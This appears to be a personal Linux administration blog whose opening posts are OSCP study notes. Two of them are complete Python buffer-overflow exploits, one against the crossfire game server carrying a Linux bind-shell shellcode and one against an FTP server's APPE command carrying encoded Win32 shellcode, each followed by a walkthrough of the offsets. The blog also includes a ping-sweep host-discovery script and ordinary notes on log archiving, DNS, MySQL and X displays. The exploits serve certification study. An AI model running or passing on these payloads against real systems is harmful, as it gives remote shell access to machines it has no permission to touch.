Matteo Michelini

Sunday, October 10, 2010

OSCP: Linux shellcode

----------------------
#!/usr/bin/python
# exploit for crossfire (Python 2: string literals are byte strings)
# usage: ./crossfire.py <target ip>

import socket, sys

if len(sys.argv) != 2:
    print 'usage: %s <host>' % sys.argv[0]
    sys.exit(1)

host = sys.argv[1]

# 78 bytes: Linux x86 bind shell, listens on TCP 4444 (0x115c); no null bytes
shellcode =("\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80"
"\x5b\x5e\x52\x68\xff\x02\x11\x5c\x6a\x10\x51\x50\x89\xe1\x6a"
"\x66\x58\xcd\x80\x89\x41\x04\xb3\x04\xb0\x66\xcd\x80\x43\xb0"
"\x66\xcd\x80\x93\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x68\x2f"
"\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0"
"\x0b\xcd\x80")

# 4379 bytes: the original crash buffer, the four Bs land in EIP at offset 4368
#crash = '\x41' * 4368 + '\x42\x42\x42\x42' + '\x43' * 7

# 0807b8f8 - Indirect Jump through %eax, which points at the start of this buffer
# 100 + 78 + 4190 = 4368 bytes before EIP, so the total stays 4379
crash = '\x90' * 100 + shellcode + '\x41' * 4190 + '\xf8\xb8\x07\x08' + '\x43' * 7

# the overflowing "setup sound" command; the \x00 in the tail ends the string,
# which is why the shellcode must not contain null bytes
buffer = '\x11(setup sound ' + crash + '\x90\x00#'

s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((host,13327))   # crossfire server port
data = s.recv(1024)       # read the banner before sending the command
print data
s.send(buffer)
s.close()
----------------------

crash = '\x90' * 100 + shellcode + '\x41' * 4190 + '\xf8\xb8\x07\x08' + '\x43' * 7

\x90 100 NOPs as a sled in front of the shellcode
\x41 a set of As to fill the space between the shellcode and the saved return address (100 + 78 + 4190 = 4368 bytes before EIP)
\xf8\xb8\x07\x08 0x0807b8f8 written little-endian: the address of an indirect jump through %eax. %eax points at the start of the buffer we sent, so the jump lands in the NOP sled and slides into the shellcode
\x43 a set of Cs to pad the buffer to the 4379 bytes of the original crash

Saturday, October 09, 2010

OSCP: shellcode in Win32

---------------------
#!/usr/bin/python
# FTP server overflow in the APPE command (Python 2: string literals are byte strings)

import socket

# 2000-byte crash buffer used to find the EIP offset (966); replaced by the real buffer below
buffer = 'A' * 2000

# 344 bytes, encoded payload
shellcode=("\x29\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x09"
"\xa3\x87\x03\x83\xeb\xfc\xe2\xf4\xf5\xc9\x6c\x4e\xe1\x5a\x78\xfc"
"\xf6\xc3\x0c\x6f\x2d\x87\x0c\x46\x35\x28\xfb\x06\x71\xa2\x68\x88"
"\x46\xbb\x0c\x5c\x29\xa2\x6c\x4a\x82\x97\x0c\x02\xe7\x92\x47\x9a"
"\xa5\x27\x47\x77\x0e\x62\x4d\x0e\x08\x61\x6c\xf7\x32\xf7\xa3\x2b"
"\x7c\x46\x0c\x5c\x2d\xa2\x6c\x65\x82\xaf\xcc\x88\x56\xbf\x86\xe8"
"\x0a\x8f\x0c\x8a\x65\x87\x9b\x62\xca\x92\x5c\x67\x82\xe0\xb7\x88"
"\x49\xaf\x0c\x73\x15\x0e\x0c\x43\x01\xfd\xef\x8d\x47\xad\x6b\x53"
"\xf6\x75\xe1\x50\x6f\xcb\xb4\x31\x61\xd4\xf4\x31\x56\xf7\x78\xd3"
"\x61\x68\x6a\xff\x32\xf3\x78\xd5\x56\x2a\x62\x65\x88\x4e\x8f\x01"
"\x5c\xc9\x85\xfc\xd9\xcb\x5e\x0a\xfc\x0e\xd0\xfc\xdf\xf0\xd4\x50"
"\x5a\xf0\xc4\x50\x4a\xf0\x78\xd3\x6f\xcb\x96\x5f\x6f\xf0\x0e\xe2"
"\x9c\xcb\x23\x19\x79\x64\xd0\xfc\xdf\xc9\x97\x52\x5c\x5c\x57\x6b"
"\xad\x0e\xa9\xea\x5e\x5c\x51\x50\x5c\x5c\x57\x6b\xec\xea\x01\x4a"
"\x5e\x5c\x51\x53\x5d\xf7\xd2\xfc\xd9\x30\xef\xe4\x70\x65\xfe\x54"
"\xf6\x75\xd2\xfc\xd9\xc5\xed\x67\x6f\xcb\xe4\x6e\x80\x46\xed\x53"
"\x50\x8a\x4b\x8a\xee\xc9\xc3\x8a\xeb\x92\x47\xf0\xa3\x5d\xc5\x2e"
"\xf7\xe1\xab\x90\x84\xd9\xbf\xa8\xa2\x08\xef\x71\xf7\x10\x91\xfc"
"\x7c\xe7\x78\xd5\x52\xf4\xd5\x52\x58\xf2\xed\x02\x58\xf2\xd2\x52"
"\xf6\x73\xef\xae\xd0\xa6\x49\x50\xf6\x75\xed\xfc\xf6\x94\x78\xd3"
"\x82\xf4\x7b\x80\xcd\xc7\x78\xd5\x5b\x5c\x57\x6b\xf9\x29\x83\x5c"
"\x5a\x5c\x51\xfc\xd9\xa3\x87\x03")

# 77D8AF0A: JMP ESP in USER32.dll on the target (the address is specific to that Windows build)
# 966 + 4 + 16 + 16 + 344 + 654 = 2000 bytes, the same size as the crash buffer
buffer = '\x41' * 966 + '\x0A\xAF\xD8\x77' + '\x43' * 16 + '\x90' * 16 + shellcode + '\x44' * 654

print 'Sending evil buffer....'
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('192.168.11.113',21))
s.recv(1024)                 # banner
s.send('USER ftp\r\n')       # log in before sending the vulnerable command
s.recv(1024)
s.send('PASS ftp\r\n')
s.recv(1024)
s.send('APPE ' + buffer + '\r\n')
s.close()
---------------------

buffer = '\x41' * 966 + '\x0A\xAF\xD8\x77' + '\x43' * 16 + '\x90' * 16 + shellcode + '\x44' * 654

'\x41' * 966 to reach the saved return address (EIP)
overwrite EIP with the address of a JMP ESP in USER32.dll (0x77D8AF0A, written little-endian; valid only for the target's Windows build)
'\x43' * 16 to reach the location ESP points at when the JMP ESP executes
'\x90' * 16 as a NOP sled
then the shellcode, and '\x44' * 654 of padding so the buffer keeps the 2000-byte length of the crash
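The two layouts above differ in where the shellcode sits relative to the overwritten return address: before it (crossfire, indirect jump through %eax back to the buffer start) or after it (the FTP server, JMP ESP). The helper below is an added example in Python 3, not code from either post: it builds each buffer from the offsets the posts give, checks that the segments add up to the original crash length and that the payload contains no null byte, and packs the return address with struct instead of spelling the bytes by hand. The placeholder payloads (runs of 0xCC int3 bytes sized like the real shellcodes, 78 and 344 bytes) are constructed for the demonstration and are not the shellcode from the page.

```python
#!/usr/bin/env python3
"""Build and sanity-check the two overflow buffers from the posts above (added example)."""
import struct


def p32(addr):
    """Pack a 32-bit address little-endian: 0x0807b8f8 -> b'\\xf8\\xb8\\x07\\x08'."""
    return struct.pack("<I", addr)


def bad_bytes(payload, badchars=b"\x00"):
    """Offsets of forbidden bytes in the payload. Both exploits send the buffer
    inside a string the target terminates at \\x00, so a null would cut it short."""
    return [i for i, b in enumerate(payload) if b in badchars]


def build(segments, total):
    """Concatenate (label, bytes) segments, record each label's offset and
    refuse any layout that does not add up to the original crash length."""
    buf, offsets = b"", {}
    for label, data in segments:
        offsets[label] = len(buf)
        buf += data
    if len(buf) != total:
        raise ValueError("layout is %d bytes, expected %d" % (len(buf), total))
    return buf, offsets


def crossfire_layout(shellcode, ret=0x0807B8F8, total=4379, eip_offset=4368, nops=100):
    """Linux/crossfire: NOP sled + shellcode go *before* EIP. EIP is overwritten
    with an indirect jump through %eax, and %eax points at the start of the
    buffer, so execution enters the sled and slides into the shellcode."""
    if bad_bytes(shellcode):
        raise ValueError("shellcode contains a null byte at %r" % bad_bytes(shellcode))
    filler = eip_offset - nops - len(shellcode)
    if filler < 0:
        raise ValueError("shellcode does not fit in the %d bytes before EIP" % eip_offset)
    return build([
        ("nops", b"\x90" * nops),
        ("shellcode", shellcode),
        ("filler", b"A" * filler),
        ("eip", p32(ret)),
        ("tail", b"C" * (total - eip_offset - 4)),
    ], total)


def jmp_esp_layout(shellcode, ret=0x77D8AF0A, total=2000, eip_offset=966, esp_gap=16, nops=16):
    """Win32/FTP: EIP is overwritten with JMP ESP, so the sled + shellcode go
    *after* the return address, at the spot ESP points to when the JMP runs."""
    if bad_bytes(shellcode):
        raise ValueError("shellcode contains a null byte at %r" % bad_bytes(shellcode))
    room = total - eip_offset - 4 - esp_gap - nops
    tail = room - len(shellcode)
    if tail < 0:
        raise ValueError("shellcode does not fit in the %d bytes after the sled" % room)
    return build([
        ("junk", b"A" * eip_offset),
        ("eip", p32(ret)),
        ("gap", b"C" * esp_gap),
        ("nops", b"\x90" * nops),
        ("shellcode", shellcode),
        ("tail", b"D" * tail),
    ], total)


# Constructed placeholder payloads: int3 (0xCC) runs with the sizes of the real
# shellcodes above (78 and 344 bytes), so the layouts can be checked offline.
LINUX_STUB = b"\xcc" * 78
WIN32_STUB = b"\xcc" * 344

if __name__ == "__main__":
    for name, (buf, off) in (("crossfire", crossfire_layout(LINUX_STUB)),
                             ("ftp", jmp_esp_layout(WIN32_STUB))):
        print("%s: %d bytes, EIP at %d = %s, shellcode at %d" % (
            name, len(buf), off["eip"], buf[off["eip"]:off["eip"] + 4].hex(), off["shellcode"]))
```

Swap the stubs for real payloads and the same checks apply: a shellcode that grows past the space available, or one with a null byte in it, is rejected before anything is sent instead of producing a buffer that silently misses EIP.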

OSCP: script for host discovery on a LAN

# for ip in $(seq 1 254); do ping -c 1 192.168.10.$ip>/dev/null; [ $? -eq 0 ] && echo "192.168.10.$ip UP" || : ; done


[ $? -eq 0 ] && echo "192.168.10.$ip UP" || :

This is the shell's short-circuit form of a ternary operator: if $? (the exit status of the last command, here ping) is 0 the host is echoed as UP, otherwise the null command : runs and nothing is printed. The trailing || : only keeps the statement's exit status at 0 when the test fails. Two caveats: Linux ping can wait up to ten seconds for a host that never answers unless you give it a reply timeout (-W 1), so a sweep of a quiet /24 is slow; and a host that filters ICMP echo is reported as down although it is there.
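For more than a handful of addresses the sequential loop is slow, and without a reply timeout every silent host stalls it. The script below is an added example in Python 3, not from the original post: it runs the same one-shot ping in parallel with a one-second timeout (-W is the Linux iputils flag; BSD and macOS ping spell it -t), and takes the probe function as a parameter so the sweep logic can be exercised without sending ICMP. Hosts that drop ICMP echo are still missed; on the local segment an ARP sweep (arp-scan, or nmap -sn -PR) is more reliable.

```python
#!/usr/bin/env python3
"""Parallel ICMP host discovery for one LAN network (added example)."""
import ipaddress
import subprocess
import sys
from concurrent.futures import ThreadPoolExecutor


def ping_host(ip, timeout=1):
    """One echo request, like `ping -c 1`, but with a reply timeout.
    -W is the Linux iputils flag. Returns True when the host answered;
    a missing ping binary or a hung process counts as 'down'."""
    try:
        result = subprocess.run(
            ["ping", "-c", "1", "-W", str(timeout), ip],
            stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL,
            timeout=timeout + 2,
        )
    except (FileNotFoundError, subprocess.TimeoutExpired):
        return False
    return result.returncode == 0


def sweep(network, probe=ping_host, workers=64):
    """Probe every host address of `network` (e.g. '192.168.10.0/24')
    concurrently and return, in address order, the ones that answered.
    `probe` is any callable ip -> bool, which lets the sweep be tested offline."""
    hosts = [str(h) for h in ipaddress.ip_network(network, strict=False).hosts()]
    with ThreadPoolExecutor(max_workers=workers) as pool:
        alive = list(pool.map(probe, hosts))
    return [ip for ip, up in zip(hosts, alive) if up]


if __name__ == "__main__":
    net = sys.argv[1] if len(sys.argv) > 1 else "192.168.10.0/24"
    for ip in sweep(net):
        print(ip, "UP")
```

Run it as `./sweep.py 192.168.10.0/24`; the worker count bounds how many ping processes run at once, which matters on a link where a burst of 254 probes would be dropped.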

Monday, October 04, 2010

HOWTO Zip Provider1 logs in ziplogs/

# cd /var/opt/CPmds-R70/customers/XXXX/CPsuite-R70/fw1/log/
# mkdir ziplogs
# for i in $(ls | cut -d '_' -f1 | sort -u) ; do if [ $(expr match $i '2010') = 4 ]; then echo zipping $i; tar -cf - $i* | gzip -c > $i.tgz && mv $i.tgz ziplogs/. && rm -rf $i*; fi; done

ls | cut -d '_' -f1 | sort -u lists each distinct prefix before the first underscore, and expr match $i '2010' prints the number of characters matched, so the test keeps only the names beginning with 2010. The original loop removed a day's files right after tar had run; chaining the steps with && at least stops the removal when the archive could not be written or moved. A pipeline's status is that of its last command (gzip), so list the archive (tar -tzf ziplogs/$i.tgz) before trusting it, and keep in mind that the rm -rf $i* glob also matches anything else that starts with that prefix.
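The one-liner deletes the originals on the strength of tar's having run, not of the archive being complete. As an added example in Python 3 (not part of the original post), the script below does the same job, grouping files by the date prefix before the first underscore, but reads the archive back and compares its members with the files on disk before anything is removed. The ziplogs/ destination and the 2010 prefix come from the post; the file names in the usage are constructed.

```python
#!/usr/bin/env python3
"""Archive log files by date prefix, verify the archive, then delete originals (added example)."""
import re
import sys
import tarfile
from pathlib import Path


def groups_by_prefix(logdir, pattern=r"^2010"):
    """Map each prefix (name up to the first '_') matching `pattern` to its
    files: the equivalent of `ls | cut -d_ -f1 | sort -u` plus the
    `expr match` test. Directories (ziplogs/ among them) are skipped."""
    groups = {}
    for path in Path(logdir).iterdir():
        if not path.is_file():
            continue
        prefix = path.name.split("_", 1)[0]
        if re.match(pattern, prefix):
            groups.setdefault(prefix, []).append(path)
    return groups


def archive_group(prefix, files, dest):
    """Write dest/<prefix>.tgz, re-open it and check that every original is
    present with the right size, and only then unlink the originals.
    On a mismatch the archive is removed and nothing is deleted."""
    dest = Path(dest)
    dest.mkdir(exist_ok=True)
    archive = dest / (prefix + ".tgz")
    with tarfile.open(str(archive), "w:gz") as tar:
        for path in sorted(files):
            tar.add(str(path), arcname=path.name)
    with tarfile.open(str(archive), "r:gz") as tar:
        members = {m.name: m.size for m in tar.getmembers()}
    expected = {p.name: p.stat().st_size for p in files}
    if members != expected:
        archive.unlink()
        raise RuntimeError("%s does not match the originals; nothing deleted" % archive)
    for path in files:
        path.unlink()
    return archive


def zip_logs(logdir, dest_name="ziplogs"):
    """Archive every matching prefix under logdir into logdir/ziplogs/.
    Returns the archives written, in prefix order."""
    logdir = Path(logdir)
    return [archive_group(prefix, files, logdir / dest_name)
            for prefix, files in sorted(groups_by_prefix(logdir).items())]


if __name__ == "__main__":
    for archive in zip_logs(sys.argv[1] if len(sys.argv) > 1 else "."):
        print("zipped", archive)
```

Run it from the fw1/log directory (or pass the path as the first argument); a second run finds nothing left to archive because ziplogs/ is a directory and is skipped.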

Tuesday, July 21, 2009

HOWTO remove files when they are too many for rm -rf *

rm -rf * fails with "Argument list too long" when the expanded list of names exceeds the kernel's limit on exec() arguments (ARG_MAX). A shell loop sidesteps it: the glob is expanded by the shell itself, which is not bound by that limit, and rm is started once per file with a single argument.

# for i in *.gz
> do
> echo "$i"
> rm -rf "$i"
> done

Quote "$i" so names with spaces survive. -f is enough for plain files; -r is only needed if some matches are directories. The same job in a single process: find . -maxdepth 1 -name '*.gz' -delete


Wednesday, January 21, 2009

dnsutils overview

host -t <type> asks for one record type; -a is the verbose "all records" query (equivalent to -v -t ANY).

# host -t MX candpartners.com
candpartners.com mail is handled by 10 mail.register.it.

# host -a candpartners.com
Trying "candpartners.com"
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 3359
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 3, AUTHORITY: 0, ADDITIONAL: 2

;; QUESTION SECTION:
;candpartners.com. IN ANY

;; ANSWER SECTION:
candpartners.com. 3600 IN NS zeus.csttech.it.
candpartners.com. 3600 IN MX 10 mail.register.it.

;; ADDITIONAL SECTION:
zeus.csttech.it. 3600 IN A 192.168.0.1
mail.register.it. 387 IN A 195.110.124.132

Received 172 bytes from 192.168.0.1#53 in 2 ms

DBA basic tasks

Importing a dump sql file
# mysql -uroot -proot
mysql> create database new_db;
mysql> \q
# mysql new_db -uroot -proot < dumpfile.sql

Exporting a dump sql file
# mysqldump -h localhost -uDB_USER -pDB_PASSWD db_name > dump_db.sql

Exporting only sql schema
# mysqldump -d -h localhost -uDB_USER -pDB_PASSWD db_name > dump_db.sql

Putting the password after -p on the command line exposes it to every local user through ps and to the shell history; a bare -p prompts for it instead, or keep it in a ~/.my.cnf readable only by you.

Setting grants
# mysql
mysql> create database new_db;
mysql> GRANT ALL ON new_db.* TO 'user'@'localhost' IDENTIFIED BY 'user_passwd';
mysql> \q

If you want to enable grants for a remote user (dynamic private IP: network 192.168.0.0/24) use

mysql> GRANT ALL ON new_db.* TO 'user'@'192.168.0.%' IDENTIFIED BY 'user_passwd';

The % wildcard admits that account from any host in 192.168.0.0/24, so grant only the privileges the application needs rather than ALL. GRANT ... IDENTIFIED BY is the MySQL 5.x form; from MySQL 8.0 the account is created with CREATE USER first and GRANT no longer accepts IDENTIFIED BY.

Saturday, January 10, 2009

HOWTO select keyboard layout in Debian

# dpkg-reconfigure console-data


Mac layouts are available too.

If you don't want to use the ncurses utility, note that all the keyboard layouts are stored under /usr/share/keymaps.
For example, to load /usr/share/keymaps/i386/qwerty/it.kmap.gz:

# loadkeys it

Use only the name without .kmap.gz. Both tools set the layout of the text console only; X keeps its own keyboard configuration.

Friday, January 09, 2009

HOWTO use an external display

-- lspci output --
01:00.0 VGA compatible controller: ATI Technologies Inc Mobility Radeon HD 3650

--

# pacman -S xf86-video-radeonhd

-- xorg.conf --
...
Section "Module"
...
Load "dri"
...
EndSection
...
Section "Device"
Identifier "Card0"
Driver "radeonhd"
VendorName "All"
BoardName "All"
Option "AGPMode" "4"
Option "ColorTiling" "on"
Option "AccelMethod" "EXA"
Option "EnablePageFlip" "on"
Option "AGPFastWrite" "yes"
EndSection
...
Section "DRI"
Mode 0666
EndSection
--

# /etc/rc.d/gdm restart

Open a new Terminal in X

$ xrandr -q
Screen 0: minimum 320 x 200, current 1600 x 2000, maximum 2560 x 2560
VGA_1 connected 1600x1200+0+800 408mm x 306mm
...
...
PANEL connected 1280x800+0+0 331mm x 207mm
...
...
$ xrandr --output VGA_1 --mode 1600x1200 --below PANEL

Instead of --below you can use --right-of, --above or --left-of.